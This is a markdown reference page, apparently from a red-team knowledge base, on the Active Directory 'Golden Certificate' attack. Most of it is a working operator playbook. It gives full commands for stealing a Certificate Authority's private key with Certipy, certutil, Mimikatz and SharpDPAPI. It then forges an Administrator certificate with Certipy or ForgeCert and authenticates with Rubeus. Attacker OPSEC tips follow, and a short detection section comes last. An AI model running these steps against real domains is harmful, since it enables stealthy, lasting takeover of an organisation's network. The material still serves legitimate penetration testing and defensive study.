attack-35-golden-certificate-attack.md (5746B)
1 --- 2 title: "Attack #35 β Golden Certificate Attack" 3 description: "The Golden Certificate attack is the ADCS equivalent of a Golden Ticket. By stealing the Certificate Authority's private key and CA certificate, anβ¦" 4 category: active-directory 5 subcategory: "ADCS & Certificates" 6 tags: ["active-directory", "adcs", "kerberos"] 7 tools: ["Mimikatz", "Rubeus", "Certipy", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Four/π’ Attack #35 β Golden Certificate Attack.md" 11 --- 12 # π’ Attack #35 β Golden Certificate Attack 13 14 *** 15 16 ## π How It Works 17 18 The Golden Certificate attack is the **ADCS equivalent of a Golden Ticket**. By stealing the Certificate Authority's **private key** and **CA certificate**, an attacker can **forge certificates for any user** entirely offline β without ever touching the CA again. These forged certificates are indistinguishable from legitimate ones because they're signed by the real CA private key. 19 20 ### Impact 21 22 - **Forge certificates for any user** β DA, EA, service accounts 23 - **Completely offline** β no CA interaction needed after key theft 24 - **Survives** password resets, KRBTGT rotation, and most remediation 25 - **Only remediation**: revoke the CA certificate and rebuild the PKI 26 27 *** 28 29 ## βοΈ Prerequisites 30 31 | Requirement | Detail | 32 |---|---| 33 | **Local admin on CA server** | To extract the CA private key | 34 | **CA private key exportable** | Default in most deployments | 35 | **Or**: backup of CA key | From `certutil -backup` or DPAPI extraction | 36 37 *** 38 39 ## π οΈ Tools 40 41 | Tool | Platform | Notes | 42 |---|---|---| 43 | **Certipy** | Linux | `backup` command to extract CA key + cert | 44 | **SharpDPAPI** | Windows | DPAPI-based CA key extraction | 45 | **Mimikatz** | Windows | `crypto::capi` / `crypto::cng` for CA key export | 46 | **certutil** | Windows | Native CA backup | 47 | **ForgeCert** | Windows | Forge certificates using stolen CA key | 48 49 *** 50 51 ## π» Full Commands 52 53 ### π΄ Step 1 β Extract CA Private Key 54 55 ```bash 56 # ββ Certipy backup (from Linux β requires admin on CA) ββββββββββββββββββββββββ 57 certipy ca -u Administrator@corp.local -p 'Password1' \ 58 -ca CORP-CA -backup -dc-ip 10.10.10.10 59 # Outputs: CORP-CA.pfx (contains CA certificate + private key) 60 ``` 61 62 ```powershell 63 # ββ certutil (on the CA server) βββββββββββββββββββββββββββββββββββββββββββββββ 64 certutil -backup C:\Temp\ca_backup p@ssword 65 # Exports CA cert + key to C:\Temp\ca_backup\ 66 67 # ββ Mimikatz β export CA key ββββββββββββββββββββββββββββββββββββββββββββββββββ 68 privilege::debug 69 crypto::capi 70 crypto::certificates /export /systemstore:LOCAL_MACHINE 71 72 # ββ SharpDPAPI β extract from DPAPI-protected store ββββββββββββββββββββββββββ 73 .\SharpDPAPI.exe certificates /machine 74 ``` 75 76 ### π΄ Step 2 β Forge Certificate for Any User 77 78 ```bash 79 # ββ Certipy β forge certificate as Administrator βββββββββββββββββββββββββββββ 80 certipy forge -ca-pfx CORP-CA.pfx -upn Administrator@corp.local \ 81 -subject 'CN=Administrator,CN=Users,DC=corp,DC=local' 82 # Output: forged_administrator.pfx 83 84 # ββ Authenticate ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 85 certipy auth -pfx forged_administrator.pfx -dc-ip 10.10.10.10 86 # Returns Administrator NT hash + TGT 87 ``` 88 89 ```powershell 90 # ββ ForgeCert (Windows) βββββββββββββββββββββββββββββββββββββββββββββββββββββββ 91 .\ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword "p@ssword" \ 92 --Subject "CN=Administrator,CN=Users,DC=corp,DC=local" \ 93 --SubjectAltName "Administrator@corp.local" \ 94 --NewCertPath forged.pfx --NewCertPassword "FakePass" 95 96 # Use Rubeus for PKINIT authentication 97 .\Rubeus.exe asktgt /user:Administrator /certificate:forged.pfx \ 98 /password:FakePass /ptt 99 ``` 100 101 *** 102 103 ## π― OPSEC Tips 104 105 - **Golden Certificate = permanent, stealthy persistence** β harder to remediate than Golden Ticket 106 - **CA key theft requires CA server admin access** β this is a post-DA persistence technique 107 - **Unlike Golden Ticket, KRBTGT rotation does NOT invalidate Golden Certificates** 108 - **Only fix**: full PKI rebuild β revoke old CA cert, issue new one, re-enroll all certificates 109 110 *** 111 112 ## π‘οΈ Detection β Event IDs 113 114 | Event ID | Source | What to Look For | 115 |---|---|---| 116 | **4768** | Security Log (DC) | PKINIT authentication with certificates not in CA database | 117 | **4886/4887** | Security Log (CA) | Missing β forged certs bypass CA logging entirely | 118 119 **Key detection challenge:** The CA never issued the forged certificate, so there's no enrollment event. Detection must focus on **PKINIT authentication events** where the presented certificate serial number doesn't exist in the CA's issued certificate database. 120 121 *** 122 123 ## π Attack Chain Context 124 125 ``` 126 [Golden Certificate] βββ Permanent Domain Persistence via PKI 127 β 128 ββββ π Survives: password resets, KRBTGT rotation, DA removal 129 ββββ π Only remediation: full PKI rebuild 130 ββββ π Prereqs: admin on CA server (via DA) 131 ββββ π Persistence ranking: Golden Certificate > Golden Ticket 132 ``` 133 134 *** 135 136 > β **Attack #35 β Golden Certificate complete.**